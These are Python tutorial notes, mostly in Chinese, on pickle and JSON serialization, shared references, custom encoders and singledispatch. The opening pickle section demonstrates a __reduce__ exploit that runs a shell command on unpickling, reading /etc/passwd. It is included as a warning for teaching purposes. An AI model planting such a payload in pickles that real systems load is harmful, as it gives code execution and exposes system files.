pickling
pickling on UNIX
重要!unpickle 的過程可能會執行任意程式碼,有資安風險。不要 unpickle 不是你自己 pickle 的資料。
import os
import pickle
class Exploit:
    """Demonstrate why unpickling untrusted data is dangerous.

    WARNING: loading a pickle of this object runs a shell command. Only use
    it for demonstration on a machine you control.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle stores for this object.

        When the pickle is loaded, the callable (``os.system``) is invoked
        with the command string below.
        """
        # cat [-u] [-s] [-v [-t] [-e]] file: used here to dump the file's
        # contents into exploit.txt.
        # curl [options] [URL...]: used here to fetch the Google home page,
        # which is appended to exploit.txt as well.
        return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
    """Pickle an ``Exploit`` instance into the file named *fname*.

    Args:
        fname: Path of the file to create or overwrite.
    """
    with open(fname, 'wb') as f:  # wb: write binary
        pickle.dump(Exploit(), f)
# Write the pickle to disk, then load it back. Loading is the step that runs
# the command returned by Exploit.__reduce__.
serialize_exploit('loadme')
with open('loadme', 'rb') as f:  # rb: read binary; the file is closed on exit
    pickle.load(f)
然後觀察該路徑(/etc/passwd)的相關檔案變化,以及檔案內容(exploit.txt,基本上就是上方程式中註解說明的:/etc/passwd 路徑內容,加上 google 首頁資料)。
上述程式僅支援 UNIX 與 macOS,不支援 MS-Windows。
Pickling Dictionaries
import pickle
# Serialize a string; pickle.dumps returns a bytes object.
d = 'Python Pickled Peppers'
ser = pickle.dumps(d)
ser
# b'\x80\x04\x95\x1a\x00\x00\x00\x00\x00\x00\x00\x8c\x16Python Pickled Peppers\x94.'
deser = pickle.loads(ser)
deser
# 'Python Pickled Peppers'
# Abridged; this is not the complete original source.
# d holds the original data and ser = pickle.dumps(d). Comparing d with the
# round-tripped object shows the difference between is (identity) and
# == (equality).
d is deser, d == deser
# (False, True)
# The same round trip works for other data types:
# ser = pickle.dumps(3.14)  # float
# ser = pickle.dumps([10, 20, ('a', 'b', 30)])  # list
# ser = pickle.dumps({'a', 'b', 'x', 10})  # set
# ser = pickle.dumps({'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}})  # dictionary
如果要 pickle 的 dictionary,其中部分值是參考另一個 dictionary 呢?
# d2 refers to the same d1 object under two keys ('y' and 'z').
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}
ser = pickle.dumps(d2)
d3 = pickle.loads(ser)
# The round-tripped nested dict is equal to the original...
d3['y'] == d2['y']
# True
# ...but it is a different object.
d3['y'] is d2['y']
# False
接著看如果資料來源是同一個(上述 d1)時,pickling 不會再做一次,而是指向同一個物件(類似 deepcopy 的行為模式)。
不只是 dictionary,lists, sets 和 tuples 也一樣。
# d2 holds one and the same object under both keys...
d2['y'] is d2['z']
# True
# ...and the unpickled copy keeps that sharing: identity, not just equality.
d3['y'] is d3['z']
# True
上述行為,在我們使用 serialization / deserialization 時要特別小心。因為參考同一個 object,serialization / deserialization 後的值,會是原來的參考值。
對照一:沒有用 serialization 時,行為符合我們預期
# Build d2 so that its 'y' entry refers to the d1 object itself.
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
# Mutating d1 is visible through d2['y'] because both refer to one dict.
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}
對照二:使用 serialization 時。下次程式執行時,d2 的值,對照到原先的 d1(沒有 'c': 3),而不是新的。
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
# d1 and d2 are pickled in two separate calls.
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)
# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2
# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)
# and continue processing as before
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}} # 'c': 3 is missing here
最後用老範例(class Person),再驗證一次上述行為。
The pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that relative references are preserved.
__
JSON Serialization
基本操作
import json # NOTE: the later examples in this document omit this import
# serialization
d1 = {'a': 100, 'b': 200}
d1_json = json.dumps(d1)
d1_json, type(d1_json)
# ('{"a": 100, "b": 200}', str)
# deserialization
d2 = json.loads(d1_json)
d2, type(d2)
# ({'a': 100, 'b': 200}, dict)
# equality checking
d1 == d2
# True
提醒:d1 serialization 前後的不同。 {'a': 100, 'b': 200} vs '{"a": 100, "b": 200}'
我們可以在 print 中,設定 json.dumps 的參數,讓顯示美觀些。
# indent=2 makes json.dumps emit one item per line, indented by two spaces.
print(json.dumps(d1, indent=2))
輸出:
{
"a": 100,
"b": 200
}
注意資料型態
Python 的 key,只要是 hashable 即可。但 JSON 的 key,必須是 string。
先來看看當 Python 的 key 是整數時,程式執行過程。
# A dictionary whose keys are integers rather than strings.
d1 = {1: 100, 2: 200}
d1_json = json.dumps(d1)
d1_json
# '{"1": 100, "2": 200}' # from 1 to "1"
# Loading the JSON text back yields string keys, not the original integers.
d2 = json.loads(d1_json)
print(d1)
# {1: 100, 2: 200}
print(d2)
# {'1': 100, '2': 200}
注意:上方的程式顯示,Python 將 key 整數,轉換為 string。1 變 "1"、2 變 "2"。
所以 d == loads(dumps(d)) 不成立。
接著看一下,Python 中的一個長字串(內容是 JSON),在做過 serialization / deserialization 後的結果。
# A multi-line Python string whose content is a JSON document.
d_json = '''
{
"name": "John Cleese",
"age": 82,
"height": 1.96,
"walksFunny": true,
"sketches": [
{
"title": "Dead Parrot",
"costars": ["Michael Palin"]
},
{
"title": "Ministry of Silly Walks",
"costars": ["Michael Palin", "Terry Jones"]
}
],
"boring": null
}
'''
# deserialize this JSON string
d = json.loads(d_json)
print(d)
# {'name': 'John Cleese', 'age': 82, 'height': 1.96,... (too long, truncated)
d
{'name': 'John Cleese',
'age': 82,
'height': 1.96,
'walksFunny': True, # was true in the JSON text
'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
{'title': 'Ministry of Silly Walks',
'costars': ['Michael Palin', 'Terry Jones']}],
'boring': None} # was null in the JSON text
注意:serialization / deserialization 後,JSON object不保證 key 的順序相同。
接著檢查 serialization / deserialization 後的資料型態。
# Print each deserialized value next to the Python type it was given.
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))
輸出:
82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>
As you can see, the JSON `array` was deserialized into a `list`, `true` was deserialized into a `bool`, integer-looking values into `int`, float-looking values into `float`, and sub-objects into `dict`.
As you can see deserializing JSON objects into Python is very straightforward and intuitive.
tuples serializing
# A dict whose value is a tuple.
d = {'a': (1, 2, 3)}
json.dumps(d)
# '{"a": [1, 2, 3]}'
Python tuples are serialized into JSON lists
# Text that uses Python tuple syntax, (1, 2, 3), where JSON expects a value.
bad_json = '''
{"a": (1, 2, 3)}
'''
json.loads(bad_json)
# JSONDecodeError # the error message is not very explicit
Python was able to serialize a tuple by making it into a JSON array
How about other data types: Decimals, Fractions, Complex Numbers, Sets, etc
Decimals
from decimal import Decimal
# Passing a Decimal value to json.dumps raises, as noted below.
json.dumps({'a': Decimal('0.5')})
# TypeError
Complex
# Complex numbers are rejected by json.dumps; catch the TypeError and print
# its message instead of letting it abort the script.
try:
    json.dumps({"a": 1+1j})
except TypeError as ex:
    print(ex)
# Object of type complex is not JSON serializable
Set
# Sets are rejected by json.dumps; catch the TypeError and print its message
# instead of letting it abort the script.
try:
    json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
    print(ex)
# Object of type set is not JSON serializable
Now we could get around that problem by looking at the string representation of those objects:
# Build the Decimal from a string, as in the earlier Decimal('0.5') example:
# a string gives exactly the digits written, whereas a float argument passes
# on the float's binary value.
str(Decimal('0.5'))
# '0.5'
json.dumps({"a": str(Decimal('0.5'))})
# '{"a": "0.5"}'
Own objects
class Person:
    """A simple record with a name and an age, used in the JSON examples."""

    def __init__(self, name, age):
        """Store *name* and *age* on the instance."""
        self.name = name
        self.age = age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``."""
        return f'Person(name={self.name}, age={self.age})'
p = Person('John', 82)
p
# Person(name=John, age=82)
# Passing the Person instance itself to json.dumps raises, as noted below.
json.dumps({"john": p})
# TypeError
Solution: write a custom JSON serializer in our class itself, and use that when we serialize the object
class Person:
    """A simple record that knows how to describe itself for JSON output."""

    def __init__(self, name, age):
        """Store *name* and *age* on the instance."""
        self.name = name
        self.age = age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return a new dict with the ``name`` and ``age`` attributes."""
        return dict(name=self.name, age=self.age)
p = Person('John', 82)
p.toJSON()
# {'name': 'John', 'age': 82}
# Serialize the dict returned by toJSON() rather than the object itself.
print(json.dumps({"john": p.toJSON()}, indent=2))
輸出:
{
"john": {
"name": "John",
"age": 82
}
}
we can make our life a little easier by using the `vars` function (or the `__dict__` attribute) to return a dictionary of our object attributes
# Two ways of getting the instance's attributes as a dictionary.
vars(p) # vars function
# {'name': 'John', 'age': 82}
p.__dict__
# {'name': 'John', 'age': 82}
class Person:
    """A simple record whose ``toJSON`` exposes every instance attribute."""

    def __init__(self, name, age):
        """Store *name* and *age* on the instance."""
        self.name = name
        self.age = age

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return a new dict holding all instance attributes.

        The result is a shallow copy of ``vars(self)``, so a caller that
        edits the returned dict does not modify the instance.
        """
        # Explicit equivalent: dict(name=self.name, age=self.age)
        return dict(vars(self))
# Re-create p so that it is an instance of the Person class defined just
# above; an instance made earlier keeps using the previous class's toJSON.
p = Person('John', 82)
json.dumps(dict(john=p.toJSON()))
# '{"john": {"name": "John", "age": 82}}'
dealing with sets, where we do not control the class definition
# Convert the set to a list before handing it to json.dumps.
s = {1, 2, 3}
json.dumps(dict(a=list(s)))
# '{"a": [1, 2, 3]}'
問題:
- we have to remember to call `.toJSON()` for our custom objects
- what about built-in or standard types like sets, or dates? use built-in or write custom functions to convert and call them every time?
Custom JSON Serialization
datetime
from datetime import datetime
import json
# NOTE(review): utcnow() gives a datetime without tzinfo; confirm whether a
# timezone-aware value (datetime.now(timezone.utc)) is wanted instead.
current = datetime.utcnow()
# datetime.datetime(2022, 12, 20, 11, 37, 44, 408640)
json.dumps(current)
# TypeError
Python raises a `TypeError` exception, stating that `datetime` objects are not JSON serializable.
from datetime import datetime
import json
def format_iso(dt):
    """Format *dt* as ``YYYY-MM-DDTHH:MM:SS`` (whole seconds, no microseconds)."""
    return dt.strftime('%Y-%m-%dT%H:%M:%S')
format_iso(current)
# '2022-12-20T11:37:44'
# datetime.isoformat() additionally includes the microseconds.
current.isoformat()
# '2022-12-20T11:37:44.408640'
# The timestamp is stored as an ISO string, so the dict holds only str values.
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}
json.dumps(log_record)
# {"time": "2022-12-20T11:42:02.394702", "message": "testing"}
this works, but this is far from ideal. Normally, our dictionary will contain the `datetime` object, not its string representation. What we have to do is write custom code to replace non-JSON serializable objects in our dictionary with custom representations.
The simplest way is to specify a function that `dump`/`dumps` will call when it encounters something it cannot serialize.
def format_iso(dt):
    """Return *dt* formatted by its own ``isoformat()`` method."""
    return dt.isoformat()


# Keep the datetime object itself in the record, so that json.dumps has to
# call format_iso for the value it cannot serialize on its own.
log_record = {'time': datetime.utcnow(), 'message': 'testing'}
json.dumps(log_record, default=format_iso)
# {"time": "2022-12-20T11:43:12.487649", "message": "testing"}
log_record = {
'time': datetime.utcnow(),
'message': 'Testing...',
'other': {'a', 'b', 'c'} # the set is not handled yet
}
# format_iso is also called for the set, which has no isoformat() method.
json.dumps(log_record, default=format_iso)
# AttributeError
if else 判斷式,一個一個加上待處理的資料型態
def custom_json_formatter(arg):
    """Return a JSON-serializable stand-in for *arg*.

    Intended as the ``default=`` callback of ``json.dumps``.

    Args:
        arg: The object the encoder could not serialize.

    Returns:
        The ISO string for a ``datetime``, or a list for a ``set``.

    Raises:
        TypeError: If *arg* is of any other type. Falling off the end would
            return ``None``, which json.dumps would silently write as
            ``null``.
    """
    if isinstance(arg, datetime):
        return arg.isoformat()
    if isinstance(arg, set):
        return list(arg)
    raise TypeError(
        f'Object of type {type(arg).__name__} is not JSON serializable'
    )
接著以萬年範例 class Person 做示範
程式碼略(原理都相同,只是換用 custom object 示範)
class Person 中的 datetime 因為已處理,不用再處理一次。
toJSON method
class Person:
    """A simple record that also remembers when it was created."""

    def __init__(self, name, age):
        """Store *name* and *age*, and stamp the instance with the current UTC time."""
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return a new dict holding all instance attributes.

        ``create_dt`` is returned as a ``datetime`` object, not as a string.
        The result is a shallow copy of ``vars(self)``, so a caller that
        edits the returned dict does not modify the instance.
        """
        # Explicit equivalent:
        # return {
        #     'name': self.name,
        #     'age': self.age,
        #     'create_dt': self.create_dt
        # }
        return dict(vars(self))
用一個較通用的方式,來處理更多不同的資料型態。
def custom_json_formatter(arg):
    """Return a JSON-serializable stand-in for *arg*, trying several strategies.

    Intended as the ``default=`` callback of ``json.dumps``. In order:

    1. ``datetime`` -> ``arg.isoformat()``
    2. ``set`` -> ``list(arg)``
    3. ``arg.toJSON()`` if that call does not raise ``AttributeError``
    4. ``vars(arg)`` if that call does not raise ``TypeError``
    5. ``str(arg)`` as the last resort
    """
    if isinstance(arg, datetime):
        return arg.isoformat()
    if isinstance(arg, set):
        return list(arg)
    try:
        return arg.toJSON()
    except AttributeError:
        pass  # fall through to the attribute dictionary
    try:
        return vars(arg)
    except TypeError:
        return str(arg)
singledispatch
re-write our custom json formatter using the generic single dispatch decorator.
from functools import singledispatch
@singledispatch
def json_format(arg):
    """Fallback formatter, used for types with no registered implementation.

    Prints *arg* and a trace of each strategy it tries, in this order:
    ``arg.toJSON()``, then ``vars(arg)``, then ``str(arg)``.
    """
    print(arg)
    try:
        print('\ttrying to use toJSON...')
        return arg.toJSON()
    except AttributeError:
        print('\tfailed - trying to use vars...')
        try:
            return vars(arg)
        except TypeError:
            print('\tfailed - using string representation...')
            return str(arg)
然後再一一 register 不同的資料型態。
@json_format.register(datetime)
def _(arg):
    """Format a datetime with its ``isoformat()`` method."""
    return arg.isoformat()


@json_format.register(set)
def _(arg):
    """Format a set as a list of its elements."""
    return list(arg)
最後用之前的 class Person 再示範一次。
class Person:
    """A simple record whose ``toJSON`` deliberately exposes only the name."""

    def __init__(self, name, age):
        """Store *name* and *age*, and stamp the instance with the current UTC time."""
        self.name = name
        self.age = age
        self.create_dt = datetime.utcnow()

    def __repr__(self):
        """Return ``Person(name=<name>, age=<age>)``."""
        return f'Person(name={self.name}, age={self.age})'

    def toJSON(self):
        """Return a new dict containing only the ``name`` attribute."""
        # For comparison, two alternatives that expose every attribute.
        # Option 1:
        # return {
        #     'name': self.name,
        #     'age': self.age,
        #     'create_dt': self.create_dt
        # }
        # Option 2:
        # return vars(self)
        return dict(name=self.name)
Custom JSON Encoding using JSONEncoder
JSONEncoder
Encode the "standard" types, such as `str`, `int`, `float`, `list`, `dict`, etc.
Python | JSON |
---|---|
dict | object {…} |
list, tuple | array […] |
str | string … |
int, float | number |
int or float Enums | number |
bool | true or false |
None | null |
TypeError exception
non-supported objects
We can actually extend this `JSONEncoder` class and override the `default` method.
import json
from datetime import datetime
class CustomJSONEncoder(json.JSONEncoder):
    """JSON encoder that additionally knows how to encode ``datetime`` objects."""

    def default(self, arg):
        """Return a serializable stand-in for *arg*.

        A ``datetime`` becomes its ISO string. Anything else is delegated to
        the base class, and that result is returned to the caller.
        """
        if isinstance(arg, datetime):
            return arg.isoformat()
        # Return the delegated result rather than discarding it.
        return super().default(arg)